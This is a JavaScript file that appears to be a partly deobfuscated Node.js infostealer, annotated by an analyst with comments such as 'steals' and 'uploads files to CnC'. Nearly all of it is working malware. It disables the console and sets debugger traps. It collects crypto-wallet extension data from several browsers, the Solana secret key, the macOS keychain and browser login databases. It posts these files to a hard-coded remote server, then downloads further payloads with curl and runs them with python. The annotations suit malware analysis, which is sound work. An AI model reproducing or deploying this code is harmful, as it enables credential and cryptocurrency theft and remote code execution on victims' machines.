660 lines
25 KiB
JavaScript
660 lines
25 KiB
JavaScript
// shifts arrOfStrs till the condition is met
|
|
(function (getArrOfStrs, magicNum) {
|
|
const arrOfStrs = getArrOfStrs();
|
|
while (true) {
|
|
try {
|
|
const _0x5bc6eb = parseInt(dec1(436, 0x120)) / 1 * (parseInt(dec1(526, 0x15)) / 2) + parseInt(dec1(518, 0x18e)) / 3 * (-parseInt(dec1(561, 0x445)) / 4) + -parseInt(dec1(448, 0x407)) / 5 * (parseInt(dec1(521, '0x448')) / 6) + parseInt(dec1(528, '0x90')) / 7 + parseInt(dec1(463, -0x56)) / 8 * (parseInt(dec1(620, 0x125)) / 9) + parseInt(dec1(529, -0xf)) / 10 + -parseInt(dec1(476, 0x279)) / 11;
|
|
if (_0x5bc6eb === magicNum) { // compare against 775960
|
|
break;
|
|
} else {
|
|
arrOfStrs.push(arrOfStrs.shift());
|
|
}
|
|
} catch (_err) {
|
|
arrOfStrs.push(arrOfStrs.shift());
|
|
}
|
|
}
|
|
})(getArrOfStrs, 775960);
|
|
|
|
// (?)
|
|
const _0x3f64bb = function () {
|
|
let flag1 = true;
|
|
return function (_0x56a168, _0x4b09b7) {
|
|
const _0x3343a9 = flag1 ? function () {
|
|
if (_0x4b09b7) {
|
|
const _0x5bdfee = _0x4b09b7.apply(_0x56a168, arguments);
|
|
_0x4b09b7 = null;
|
|
return _0x5bdfee;
|
|
}
|
|
} : function () {};
|
|
flag1 = false;
|
|
return _0x3343a9;
|
|
};
|
|
}();
|
|
|
|
// (?)
|
|
const _0xb564a4 = _0x3f64bb(this, function () {
|
|
return _0xb564a4.toString().search("(((.+)+)+)+$").toString().constructor(_0xb564a4).search("(((.+)+)+)+$");
|
|
});
|
|
|
|
// (?), (unused)
|
|
function _0x23f8f9(_0x578d77, _0x599245, _0x29ff3c, _0xdc1b7e, _0x48949a) {
|
|
return dec1(_0xdc1b7e + 755, _0x48949a);
|
|
}
|
|
|
|
_0xb564a4();
|
|
|
|
// (?)
|
|
const _0x2fd3bd = function () {
|
|
let flag2 = true;
|
|
return function (_0x4380c3, _0x332592) {
|
|
const _0x263396 = flag2 ? function () {
|
|
if (_0x332592) {
|
|
const _0x548336 = _0x332592.apply(_0x4380c3, arguments);
|
|
_0x332592 = null;
|
|
return _0x548336;
|
|
}
|
|
} : function () {};
|
|
flag2 = false;
|
|
return _0x263396;
|
|
};
|
|
}();
|
|
|
|
// (?)
|
|
(function () {
|
|
_0x2fd3bd(this, function () {
|
|
const _0x18fbc2 = new RegExp("function *\\( *\\)");
|
|
const _0x34bf5d = new RegExp("\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)", 'i');
|
|
const _0x100ae1 = _0x23e34d("init");
|
|
if (!_0x18fbc2.test(_0x100ae1 + "chain") || !_0x34bf5d.test(_0x100ae1 + "input")) {
|
|
_0x100ae1('0');
|
|
} else {
|
|
_0x23e34d();
|
|
}
|
|
})();
|
|
})();
|
|
|
|
// (?)
|
|
const _0x2a5a96 = function () {
|
|
let flag3 = true;
|
|
return function (_0x4bdc0a, _0x2d3630) {
|
|
const _0x4d49c5 = flag3 ? function () {
|
|
if (_0x2d3630) {
|
|
const _0x6d2bf8 = _0x2d3630.apply(_0x4bdc0a, arguments);
|
|
_0x2d3630 = null;
|
|
return _0x6d2bf8;
|
|
}
|
|
} : function () {};
|
|
flag3 = false;
|
|
return _0x4d49c5;
|
|
};
|
|
}();
|
|
|
|
// (?), (unused)
|
|
function _0x7010db(_0x3a87e1, _0x262e58, _0x514759, _0x2b76a4, _0x4bebf3) {
|
|
return dec1(_0x2b76a4 - 0x33c, _0x4bebf3);
|
|
}
|
|
|
|
// disables console.*
|
|
const _0x42c5cd = _0x2a5a96(this, function () {
|
|
const obj = {
|
|
FZJcA: function (_0x3da6c0, _0x394407) {
|
|
return _0x3da6c0 + _0x394407;
|
|
},
|
|
OkPvv: "error"
|
|
};
|
|
obj.YCNuG = "table";
|
|
const getGlobalsObj = function () {
|
|
let _0x4fa761;
|
|
try {
|
|
_0x4fa761 = Function("return (function() {}.constructor(\"return this\")( ));")();
|
|
} catch (_0x3bd620) {
|
|
_0x4fa761 = window;
|
|
}
|
|
return _0x4fa761;
|
|
};
|
|
const globalsObj = getGlobalsObj();
|
|
const _0x5673cb = globalsObj.console = globalsObj.console || {};
|
|
const consoleLogTypes = ["log", "warn", "info", "error", "exception", obj.YCNuG, "trace"];
|
|
for (let i = 0; i < consoleLogTypes.length; i++) {
|
|
const _0x180732 = _0x2a5a96.constructor.prototype.bind(_0x2a5a96);
|
|
const currConsoleLogType = consoleLogTypes[i];
|
|
const _0x2797c6 = _0x5673cb[currConsoleLogType] || _0x180732;
|
|
_0x180732.__proto__ = _0x2a5a96.bind(_0x2a5a96);
|
|
_0x180732.toString = _0x2797c6.toString.bind(_0x2797c6);
|
|
_0x5673cb[currConsoleLogType] = _0x180732;
|
|
}
|
|
});
|
|
|
|
_0x42c5cd();
|
|
|
|
const fs = require('fs');
|
|
const os = require('os');
|
|
const path = require("path");
|
|
const request = require("request");
|
|
const exec = require("child_process").exec;
|
|
const hostname = os.hostname();
|
|
const platform = os.platform();
|
|
const homedir = os.homedir();
|
|
const tmpdir = os.tmpdir();
|
|
|
|
const getPathRelativeToHomedir = _0x2b012b => _0x2b012b.replace(/^~([a-z]+|\/)/, (_, _0x772cb7) => '/' === _0x772cb7 ? homedir : path.dirname(homedir) + '/' + _0x772cb7);
|
|
|
|
function pathExists(_0x23cb6a) {
|
|
try {
|
|
fs.accessSync(_0x23cb6a);
|
|
return true;
|
|
} catch (_err) {
|
|
return false;
|
|
}
|
|
}
|
|
|
|
// [windows, macos, linux]
|
|
const bravePaths = ["Local/BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser"];
|
|
const chromePaths = ["Local/Google/Chrome", "Google/Chrome", "google-chrome"];
|
|
const operaPaths = ["Roaming/Opera Software/Opera Stable", "com.operasoftware.Opera", "opera"];
|
|
|
|
const extensionIds = ["nkbihfbeogaeaoehlefnkodbefgpgknn", "ejbalbakoplchlghecdalmeeeajnimhm", "fhbohimaelbohpjbbldcngcnapndodjp", "hnfanknocfeofbddgcijnmhnfnkdnaad", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "aeachknmefphepccionboohckonoeemg", "hifafgmccdpekplomjjkcfgodnhcellj", "jblndlipeogpafnldhgmapagcccfchpi", "acmacodkjbdgmoleebolmdjonilkdbch", "dlcobpjiigpikoobohmabehhmhfoodbb", "aholpfdialjgjfhomihkjbmgjidlcdno"];
|
|
|
|
// steals browser extension wallets' log and db files, and also Solana CLI default wallet secret key
|
|
const stealBrowserExtensionFiles = async (browserPath, someNumberAndUnderscore, checkForIdJson, timestamp) => {
|
|
let idJsonPath;
|
|
if (!browserPath || '' === browserPath) {
|
|
return [];
|
|
}
|
|
try {
|
|
if (!pathExists(browserPath)) {
|
|
return [];
|
|
}
|
|
} catch (_err) {
|
|
return [];
|
|
}
|
|
if (!someNumberAndUnderscore) {
|
|
someNumberAndUnderscore = '';
|
|
}
|
|
let filesToSteal = [];
|
|
for (let i = 0; i < 200; i++) {
|
|
const extensionsPath = browserPath + '/' + (0 === i ? "Default" : "Profile " + i) + "/Local Extension Settings";
|
|
for (let j = 0; j < extensionIds.length; j++) {
|
|
let extensionPath = extensionsPath + '/' + extensionIds[j];
|
|
if (pathExists(extensionPath)) {
|
|
let extensionPathItems = [];
|
|
try {
|
|
extensionPathItems = fs.readdirSync(extensionPath);
|
|
} catch (_0x4f5794) {
|
|
extensionPathItems = [];
|
|
}
|
|
extensionPathItems.forEach(async itemPath => {
|
|
let itemRealPath = path.join(extensionPath, itemPath);
|
|
try {
|
|
const options = {
|
|
filename: "102_" + someNumberAndUnderscore + i + '_' + extensionIds[j] + '_' + itemPath
|
|
};
|
|
if (itemRealPath.includes(".log") || itemRealPath.includes(".ldb")) {
|
|
filesToSteal.push({
|
|
'value': fs.createReadStream(itemRealPath),
|
|
'options': options
|
|
});
|
|
}
|
|
} catch (_err) {}
|
|
});
|
|
}
|
|
}
|
|
}
|
|
if (checkForIdJson && (idJsonPath = homedir + "/.config/solana/id.json", fs.existsSync(idJsonPath))) {
|
|
try {
|
|
const options = {
|
|
filename: "solana_id.txt"
|
|
};
|
|
filesToSteal.push({
|
|
'value': fs.createReadStream(idJsonPath),
|
|
'options': options
|
|
});
|
|
} catch (_err) {}
|
|
}
|
|
uploadFiles(filesToSteal, timestamp);
|
|
return filesToSteal;
|
|
};
|
|
|
|
// steals Firefox extension files (not just wallet ones)
|
|
const stealFirefoxExtensionFiles = timestamp => {
|
|
const firefoxProfilesPath = getPathRelativeToHomedir('~/') + "/AppData/Roaming/Mozilla/Firefox/Profiles";
|
|
let filesToSteal = [];
|
|
if (pathExists(firefoxProfilesPath)) {
|
|
let firefoxProfilesPathItems = [];
|
|
try {
|
|
firefoxProfilesPathItems = fs.readdirSync(firefoxProfilesPath);
|
|
} catch (_0x33914c) {
|
|
firefoxProfilesPathItems = [];
|
|
}
|
|
let outerCounter = 0;
|
|
firefoxProfilesPathItems.forEach(async itemPath1 => {
|
|
const obj = {
|
|
GfbKa: ".files"
|
|
};
|
|
obj.vdKma = "idb";
|
|
let profilePath = path.join(firefoxProfilesPath, itemPath1);
|
|
if (profilePath.includes("-release")) { // default-release
|
|
let siteStoragePath = path.join(profilePath, "/storage/default");
|
|
let siteStoragePathItems = [];
|
|
siteStoragePathItems = fs.readdirSync(siteStoragePath);
|
|
let innerCounter = 0;
|
|
siteStoragePathItems.forEach(async itemPath2 => { // default-release/storage/default/*
|
|
if (itemPath2.includes("moz-extension")) {
|
|
let extensionStoragePath = path.join(siteStoragePath, itemPath2);
|
|
extensionStoragePath = path.join(extensionStoragePath, obj.vdKma);
|
|
let extensionStoragePathItems = [];
|
|
extensionStoragePathItems = fs.readdirSync(extensionStoragePath);
|
|
extensionStoragePathItems.forEach(async itemPath3 => { // default-release/storage/default/<extId>/idb/*
|
|
if (itemPath3.includes(".files")) {
|
|
let _0x7d359f = path.join(extensionStoragePath, itemPath3);
|
|
let _0x5ef2d8 = [];
|
|
_0x5ef2d8 = fs.readdirSync(_0x7d359f);
|
|
_0x5ef2d8.forEach(_0x542571 => { // default-release/storage/default/<extId>/idb/<...>.files/*
|
|
if (!fs.statSync(path.join(_0x7d359f, _0x542571)).isDirectory()) { // skips directories
|
|
let filePath = path.join(_0x7d359f, _0x542571);
|
|
const options = {
|
|
filename: outerCounter + '_' + innerCounter + '_' + _0x542571
|
|
};
|
|
filesToSteal.push({
|
|
'value': fs.createReadStream(filePath),
|
|
'options': options
|
|
});
|
|
}
|
|
});
|
|
}
|
|
});
|
|
}
|
|
});
|
|
innerCounter += 1;
|
|
}
|
|
outerCounter += 1;
|
|
});
|
|
uploadFiles(filesToSteal, timestamp);
|
|
return filesToSteal;
|
|
}
|
|
};
|
|
|
|
// uploads files to CnC
|
|
const uploadFiles = (filesToSteal, timestamp) => {
|
|
const formData = {
|
|
type: '10',
|
|
hid: "102_" + hostname,
|
|
uts: timestamp,
|
|
multi_file: filesToSteal
|
|
};
|
|
try {
|
|
if (filesToSteal.length > 0) {
|
|
const _0x13e86c = {
|
|
url: "http://95.164.17.24:1224/uploads",
|
|
formData: formData
|
|
};
|
|
request.post(_0x13e86c, (_0x3ba857, _0x24b030, _0xa33a27) => {});
|
|
}
|
|
} catch (_err) {}
|
|
};
|
|
|
|
const stealChromiumBasedBrowserExtensionFiles = async (paths, browserId, timestamp) => { // browserId: 0 => chrome, 1 => brave, 2 => opera
|
|
try {
|
|
let browserPath = '';
|
|
browserPath =
|
|
'd' == platform[0]
|
|
? getPathRelativeToHomedir('~/') + "/Library/Application Support/" + paths[1] // macos
|
|
: 'l' == platform[0]
|
|
? getPathRelativeToHomedir('~/') + "/.config/" + paths[2] // linux
|
|
: getPathRelativeToHomedir('~/') + "/AppData/" + paths[0] + "/User Data"; // windows
|
|
await stealBrowserExtensionFiles(browserPath, browserId + '_', 0 == browserId, timestamp);
|
|
} catch (_0xb053ff) {}
|
|
};
|
|
|
|
// steals macOS login keychain, Chrome and Brave login data files
|
|
const stealMacosKeychainAndChromiumLoginDataFiles = async timestamp => {
|
|
let filesToSteal = [];
|
|
let loginKeychainPath = homedir + "/Library/Keychains/login.keychain";
|
|
if (fs.existsSync(loginKeychainPath)) {
|
|
try {
|
|
const options = {
|
|
filename: "logkc-db"
|
|
};
|
|
filesToSteal.push({
|
|
'value': fs.createReadStream(loginKeychainPath),
|
|
'options': options
|
|
});
|
|
} catch (_err) {}
|
|
} else {
|
|
loginKeychainPath += "-db";
|
|
if (fs.existsSync(loginKeychainPath)) {
|
|
try {
|
|
const options = {
|
|
filename: "logkc-db"
|
|
};
|
|
filesToSteal.push({
|
|
'value': fs.createReadStream(loginKeychainPath),
|
|
'options': options
|
|
});
|
|
} catch (_err) {}
|
|
}
|
|
}
|
|
try {
|
|
let chromeFilesPath = homedir + "/Library/Application Support/Google/Chrome";
|
|
if (pathExists(chromeFilesPath)) {
|
|
for (let i = 0; i < 200; i++) {
|
|
const loginDataFilePath = chromeFilesPath + '/' + (0 === i ? "Default" : "Profile " + i) + "/Login Data";
|
|
try {
|
|
if (!pathExists(loginDataFilePath)) {
|
|
continue;
|
|
}
|
|
const ldFilePath = chromeFilesPath + "/ld_" + i;
|
|
const options = {
|
|
filename: "pld_" + i
|
|
};
|
|
if (pathExists(ldFilePath)) {
|
|
filesToSteal.push({
|
|
'value': fs.createReadStream(ldFilePath),
|
|
'options': options
|
|
});
|
|
} else {
|
|
fs.copyFile(loginDataFilePath, ldFilePath, _0x3d1081 => {
|
|
const options = {
|
|
filename: "pld_" + i
|
|
};
|
|
let filesToSteal2 = [{
|
|
'value': fs.createReadStream(loginDataFilePath),
|
|
'options': options
|
|
}];
|
|
uploadFiles(filesToSteal2, timestamp);
|
|
});
|
|
}
|
|
} catch (_err) {}
|
|
}
|
|
}
|
|
} catch (_err) {}
|
|
try {
|
|
let braveFilesPath = homedir + "/Library/Application Support/BraveSoftware/Brave-Browser";
|
|
if (pathExists(braveFilesPath)) {
|
|
for (let i = 0; i < 200; i++) {
|
|
const profilePath = braveFilesPath + '/' + (0 === i ? "Default" : "Profile " + i);
|
|
try {
|
|
if (!pathExists(profilePath)) {
|
|
continue;
|
|
}
|
|
const loginDataFilePath = profilePath + "/Login Data";
|
|
const options = {
|
|
filename: "brld_" + i
|
|
};
|
|
if (pathExists(loginDataFilePath)) {
|
|
filesToSteal.push({
|
|
'value': fs.createReadStream(loginDataFilePath),
|
|
'options': options
|
|
});
|
|
} else {
|
|
fs.copyFile(profilePath, loginDataFilePath, _0x11a26c => {
|
|
const options = {
|
|
filename: "brld_" + i
|
|
};
|
|
let filesToSteal3 = [{
|
|
'value': fs.createReadStream(profilePath),
|
|
'options': options
|
|
}];
|
|
uploadFiles(filesToSteal3, timestamp);
|
|
});
|
|
}
|
|
} catch (_err) {}
|
|
}
|
|
}
|
|
} catch (_err) {}
|
|
uploadFiles(filesToSteal, timestamp);
|
|
return filesToSteal;
|
|
};
|
|
|
|
// steals local state and login data files of the given Chromium based browser
|
|
const stealChromiumLocalStateAndLoginDataFiles = async (browserPaths, browserId, timestamp) => {
|
|
let filesToSteal = [];
|
|
let browserRealPath = '';
|
|
browserRealPath = 'd' == platform[0] ? getPathRelativeToHomedir('~/') + "/Library/Application Support/" + browserPaths[1] : 'l' == platform[0] ? getPathRelativeToHomedir('~/') + "/.config/" + browserPaths[2] : getPathRelativeToHomedir('~/') + "/AppData/" + browserPaths[0] + "/User Data";
|
|
let localStateFilePath = browserRealPath + "/Local State";
|
|
if (fs.existsSync(localStateFilePath)) {
|
|
try {
|
|
const options = {
|
|
filename: browserId + "_lst"
|
|
};
|
|
filesToSteal.push({
|
|
'value': fs.createReadStream(localStateFilePath),
|
|
'options': options
|
|
});
|
|
} catch (_err) {}
|
|
}
|
|
try {
|
|
if (pathExists(browserRealPath)) {
|
|
for (let i = 0; i < 200; i++) {
|
|
const profilePath = browserRealPath + '/' + (0 === i ? "Default" : "Profile " + i);
|
|
try {
|
|
if (!pathExists(profilePath)) {
|
|
continue;
|
|
}
|
|
const loginDataFilePath = profilePath + "/Login Data";
|
|
if (!pathExists(loginDataFilePath)) {
|
|
continue;
|
|
}
|
|
const options = {
|
|
filename: browserId + '_' + i + "_uld"
|
|
};
|
|
filesToSteal.push({
|
|
'value': fs.createReadStream(loginDataFilePath),
|
|
'options': options
|
|
});
|
|
} catch (_err) {}
|
|
}
|
|
}
|
|
} catch (_err) {}
|
|
uploadFiles(filesToSteal, timestamp);
|
|
return filesToSteal;
|
|
};
|
|
|
|
// (?), (unused)
|
|
function _0x4db77a(_0x54d20b, _0x2335f6, _0x3f5711, _0x24fd41, _0x1c2503) {
|
|
return dec1(_0x1c2503 + 713, _0x24fd41);
|
|
}
|
|
|
|
let someSize = 0;
|
|
|
|
// (?)
|
|
(function () {
|
|
let _0x635dd9;
|
|
try {
|
|
const _0x35f3bc = Function("return (function() {}.constructor(\"return this\")( ));");
|
|
_0x635dd9 = _0x35f3bc();
|
|
} catch (_0x2817b8) {
|
|
_0x635dd9 = window;
|
|
}
|
|
_0x635dd9.setInterval(_0x23e34d, 4000);
|
|
})();
|
|
|
|
// (?), (unused)
|
|
function _0x3e8d45(_0x11f906, _0x1630cb, _0xdb2689, _0x5aaac9, _0x2648fd) {
|
|
return dec1(_0xdb2689 - '0x32b', _0x1630cb);
|
|
}
|
|
|
|
function getArrOfStrs() {
|
|
const arrOfStrs = ['RHmqc', 'omjjk', 'ApteI', 'sCumQ', 'copyF', '/ld_', 'rome', 'fgpgk', 'exec', 'rneKI', 'lLrSF', 'push', 'test', 'const', 'OiABa', 'nkbih', 'ocal/', '/Libr', 'gpafn', '/Logi', 'count', 'hostn', '/Goog', 'type', 'ain', 'gger', '3037OzSgDk', 'ctor(', 'round', 'fdial', 'multi', 'mdjon', 'ata', 'idb', 'oihof', "is\")(", 'knmef', 'ync', '125CwSmIC', 'VPgoc', 'ware/', 'ess', 'IGRsE', "\\pyth", 'repla', 'Micro', 'wlUAS', '0-9a-', "\\+\\+ ", 'ensio', '-rele', 'pjiig', 'SvCSl', '16zYubJH', 'bind', 'rmSyn', 'hoSHZ', 'e/Chr', 'log', 'hfood', 'LswSJ', 'write', 'wynjd', '//95.', 'OkPvv', 'woHII', '13479389yigTOw', 'TzzgA', 'oohck', 'ort/G', '/AppD', 'Brave', 'googl', '_lst', 'ata/', 'acmac', 'AVJaB', 'on.ex', 'isDir', 'Data', 'lengt', 'jXfuU', "\\.pyp", 'yzTXQ', 'url', 'jgjfh', 'inclu', 'call', 'ng/Op', '$]*)', 'xfpZo', 'filen', 'eebol', 'ome', 'jblnd', 'excep', 'ZDfOB', 'brld_', 'bohma', 'aeaoe', 'uCJgo', 'nt/', 'trace', "n3 \"", 'IOjHQ', 'ejbal', 'nhcel', 'NNhzn', '382902FMrTAX', 'StRpE', 'ort/B', '23610RVWEoM', 'ion', 'oamin', 'table', 'pebkl', '164qDPepv', 'hid', '6465221OiGmbD', '15101090qJHwNn', 'Z_$][', 'bbldc', 'Strea', 'ogin.', 'nstru', 'post', 'ZEGam', 'JOVFD', "l Ext", 'init', '/stor', 'info', 'oZjzq', 'g/Moz', 'wOJfi', ')+)+)', 'ser', 'ame', "n (fu", 'nmhnf', 'WpCbt', 'xtens', 'bGCdl', 'forEa', '*(?:[', 'nctio', 'Defau', 'ary/K', 'bfnae', 'moz-e', 'apply', '28JNYCjU', 'rave-', '/.con', "rn th", 'UroxN', 'http:', 'des', 'raveS', 'HGaea', "-Lo \"", '/id.j', " (tru", 'fbeog', 'are/B', 'eSoft', 'ofile', " Supp", 'size', 'solan', 'bvLnu', 'path', 'Roami', 'input', 'ata/R', 'cionb', 'sJMRc', 'fOasi', 'wambz', 'dgcij', 'dlcob', 'oogle', 'conso', "ion *", "l Sta", 'tmpdi', 'warn', 'peras', "e\" \"", 'logkc', 'FZJcA', 'formD', 'statS', 'setIn', 'opera', 'lipeo', 'jXzWn', 'BmaWn', '.ldb', 'ophhp', 'error', 'eycha', '/Loca', 'funct', 'DHpkL', 'ation', 'pytho', '/pdow', 'Firef', '/.npl', '1396917dSIpDK', 'proto', 'Brows', 'lmeee', 'child', 'ins/l', 'ajnim', 'bohpj', 'ing', '_proc', 'fhboh', 'knocf', '(((.+', 'ibnej', "\" \"", 're.Op', '/uplo', "xf ", 'apagc', "n() ", 'czYua', 'DaCRF', 'GfbKa', 'pplic', 'PlQuv', "\"retu", 'eofbd', 'lmome', 'searc', 'ile', 'hifaf', 'vdKma', 'lYbbZ', " Data", 're/Op', 'onoee', 'imhlp', '7.24:', "\\( *\\", 'pld_', 'ave-B', 'gdVKS', 'ox/Pr', 'Nchdc', 'CAdIA', 'eRead', 'ads', 'YvgzM', "n Dat", 'state', 'retur', 'ructo', '/Brav', 'readd', 'bakop', 'JLXSG', 'strin', 'imael', 'efaul', 'Softw', 'ilkdb', "e) {}", 'Objec', 'ector', 'Profi', 'soft/', 'join', 'le/Ch', 'eSync', 'homed', '102', 'behhm', 'platf', 'keych', '164.1', 'dfjmm', 'aholp', 'VpXqy', '.log', 'pekpl', "curl ", 'qaEUw', '.file', '/clie', 'JPxEu', 'exist', 'acces', '1224', 'kkolj', "tar -", 'ldhgm', "le ", 'ata/L', 'aeach', 'lchlg', 'mgjnj', 'age/d', '_file', 'UaQym', 'oftwa', 'FileS', 'QxhnJ', 'toStr', 'cfgod', 'YCNuG', 'OaJhU', " -C ", 'cyKTi', 'Etbne', '__pro', 'tings', 'ccfch', 'txt', '{}.co', 'irSyn', "\\p2.z", 'fig/', '-Brow', 'renam', 'dirna', 'SIQUz', 'Edge/', '_uld', 'RdYzg', 'hecda', 'reque', '/Chro', 'sSync', 're/Br', 'jbmgj', 'phepc', 'ary/A', 'uts', 'pndod', 'fig/s', 'kodbe', 'omihk', 'WSGWI', 'nkdna', 'zA-Z_', 'olana', 'PwHqq', 'a-zA-', 'kpcnl', 'creat', 'terva', 'illa/', 'ase', 'WDvbl', '/User', 'to__', 'debu', 'orm', 'owgIh', 'ZVViQ', 'idlcd', 'gvOfj', "era S", 'rowse', 'SfxxB', 'ort/', 'pikoo', "n Set", "\\p.zi", 'dgmol', 'odkjb', 'chain', 'lZQox', "User ", 'a_id.', 'son', 'mnkoe', 'era', 'Local', 'gmccd', 'tion', 'actio', 'e-chr', 'get', 'ngcna', '-db', 'while', 'hlefn', 'com.o', 'hnfan', 'ihOIO', 'Googl', 'getTi'];
|
|
getArrOfStrs = function () {
|
|
return arrOfStrs;
|
|
};
|
|
return getArrOfStrs();
|
|
}
|
|
|
|
const extractZipFile = async zipFilePath => {
|
|
exec("tar -xf " + zipFilePath + " -C " + homedir, (_0x324a1d, _0x252b20, _0x133078) => {
|
|
if (_0x324a1d) { // error check?
|
|
fs.rmSync(zipFilePath);
|
|
return void (someSize = 0);
|
|
}
|
|
fs.rmSync(zipFilePath);
|
|
_0x12016a();
|
|
});
|
|
};
|
|
|
|
// starts downloading "p.zi" via curl, then checks again 20 secs later and renames "p.zi" to "p2.zip"
|
|
const renameOrDownloadZipPayload = () => {
|
|
const pDotZiFilePath = tmpdir + "\\p.zi";
|
|
const p2DotZipFilePath = tmpdir + "\\p2.zip";
|
|
if (someSize >= 51476596) {
|
|
return;
|
|
}
|
|
if (fs.existsSync(pDotZiFilePath)) {
|
|
try {
|
|
var pDotZiFileStat = fs.statSync(pDotZiFilePath);
|
|
if (pDotZiFileStat.size >= 51476596) {
|
|
someSize = pDotZiFileStat.size;
|
|
fs.rename(pDotZiFilePath, p2DotZipFilePath, _0x553356 => {
|
|
if (_0x553356) { // error check?
|
|
throw _0x553356;
|
|
}
|
|
extractZipFile(p2DotZipFilePath);
|
|
});
|
|
} else {
|
|
if (someSize < pDotZiFileStat.size) {
|
|
someSize = pDotZiFileStat.size;
|
|
} else {
|
|
fs.rmSync(pDotZiFilePath);
|
|
someSize = 0;
|
|
}
|
|
runRenameOrDownloadZipPayload20SecsLater();
|
|
}
|
|
} catch (_err) {}
|
|
} else {
|
|
exec("curl -Lo \"" + pDotZiFilePath + "\" \"" + "http://95.164.17.24:1224/pdown" + "\"", (_0x5411ad, _0xcb4513, _0x5de2d3) => {
|
|
if (_0x5411ad) { // error check?
|
|
someSize = 0;
|
|
return void runRenameOrDownloadZipPayload20SecsLater();
|
|
}
|
|
try {
|
|
someSize = 51476596;
|
|
fs.renameSync(pDotZiFilePath, p2DotZipFilePath);
|
|
extractZipFile(p2DotZipFilePath);
|
|
} catch (_err) {}
|
|
});
|
|
}
|
|
};
|
|
|
|
function runRenameOrDownloadZipPayload20SecsLater() {
|
|
setTimeout(() => {
|
|
renameOrDownloadZipPayload();
|
|
}, 20000);
|
|
}
|
|
|
|
// (?), (unused)
|
|
function _0x57a4c1(_0x43c66e, _0x2a997b, _0x48cd90, _0x40e99d, _0x1e8e5b) {
|
|
return dec1(_0x40e99d - '0x275', _0x2a997b);
|
|
}
|
|
|
|
const _0x12016a = async () => await new Promise((_0x233d9e, _0x5c8f91) => {
|
|
if ('w' == platform[0]) {
|
|
if (fs.existsSync(homedir + "\\.pyp\\python.exe")) {
|
|
(() => {
|
|
const _0xd5cb33 = homedir + "/.npl";
|
|
const _0x8f1f03 = "\"" + homedir + "\\.pyp\\python.exe\" \"" + _0xd5cb33 + "\"";
|
|
try {
|
|
fs.rmSync(_0xd5cb33);
|
|
} catch (_err) {}
|
|
request.get("http://95.164.17.24:1224/client/10/102", (_0x4b6c32, _0x5867cc, _0x301229) => {
|
|
if (!_0x4b6c32) {
|
|
try {
|
|
fs.writeFileSync(_0xd5cb33, _0x301229);
|
|
exec(_0x8f1f03, (_0x4795b0, _0x118518, _0x147813) => {});
|
|
} catch (_0x1b1d20) {}
|
|
}
|
|
});
|
|
})();
|
|
} else {
|
|
renameOrDownloadZipPayload();
|
|
}
|
|
} else {
|
|
(() => {
|
|
request.get("http://95.164.17.24:1224/client/10/102", (_0x571ef, _0x54cdca, _0x20d052) => {
|
|
if (!_0x571ef) {
|
|
fs.writeFileSync(homedir + "/.npl", _0x20d052);
|
|
exec("python3 \"" + homedir + "/.npl\"", (_0xc70c90, _0x515aed, _0x3e5a0a) => {});
|
|
}
|
|
});
|
|
})();
|
|
}
|
|
});
|
|
|
|
var _0x533351 = 0;
|
|
|
|
const _0x196775 = async () => {
|
|
try {
|
|
const timestamp = Math.round(new Date().getTime() / 1000);
|
|
await (async () => {
|
|
try {
|
|
await stealChromiumBasedBrowserExtensionFiles(chromePaths, 0, timestamp);
|
|
await stealChromiumBasedBrowserExtensionFiles(bravePaths, 1, timestamp);
|
|
await stealChromiumBasedBrowserExtensionFiles(operaPaths, 2, timestamp);
|
|
stealFirefoxExtensionFiles(timestamp);
|
|
if ('w' == platform[0]) {
|
|
await stealBrowserExtensionFiles(getPathRelativeToHomedir('~/') + "/AppData/Local/Microsoft/Edge/User Data", '3_', false, timestamp);
|
|
}
|
|
if ('d' == platform[0]) {
|
|
await stealMacosKeychainAndChromiumLoginDataFiles(timestamp);
|
|
} else {
|
|
await stealChromiumLocalStateAndLoginDataFiles(chromePaths, 0, timestamp);
|
|
await stealChromiumLocalStateAndLoginDataFiles(bravePaths, 1, timestamp);
|
|
await stealChromiumLocalStateAndLoginDataFiles(operaPaths, 2, timestamp);
|
|
}
|
|
} catch (_0x17de0d) {}
|
|
})();
|
|
_0x12016a();
|
|
} catch (_0xf5fe05) {}
|
|
};
|
|
_0x196775();
|
|
_0x12016a();
|
|
function dec1(in1, _) {
|
|
const arrOfStrs = getArrOfStrs();
|
|
dec1 = function (in1, _) {
|
|
in1 = in1 - 300;
|
|
let _0x159f5f = arrOfStrs[in1];
|
|
return _0x159f5f;
|
|
};
|
|
return dec1(in1, _);
|
|
}
|
|
let _0xed7e8 = setInterval(() => {
|
|
if ((_0x533351 += 1) < 5) {
|
|
_0x196775();
|
|
} else {
|
|
clearInterval(_0xed7e8);
|
|
}
|
|
}, 30000);
|
|
|
|
// (?)
|
|
function _0x23e34d(initFlag) {
|
|
const obj = {
|
|
divide: function (op1, op2) {
|
|
return op1 / op2;
|
|
}
|
|
};
|
|
obj.mod = function (op1, op2) {
|
|
return op1 % op2;
|
|
};
|
|
obj.literalAction = "action";
|
|
function _0x36aeff(_0x314f83) {
|
|
if (typeof _0x314f83 === "string") {
|
|
return function (_0x19d64e) {}.constructor("while (true) {}").apply("counter");
|
|
} else if (('' + _0x314f83 / _0x314f83).length !== 1 || obj.mod(_0x314f83, 20) === 0) {
|
|
(function () {
|
|
return true;
|
|
}).constructor("debugger").call(obj.literalAction);
|
|
} else {
|
|
(function () {
|
|
return false;
|
|
}).constructor("debugger").apply("stateObject");
|
|
}
|
|
_0x36aeff(++_0x314f83);
|
|
}
|
|
try {
|
|
if (initFlag) {
|
|
return _0x36aeff;
|
|
} else {
|
|
_0x36aeff(0);
|
|
}
|
|
} catch (_err) {}
|
|
} |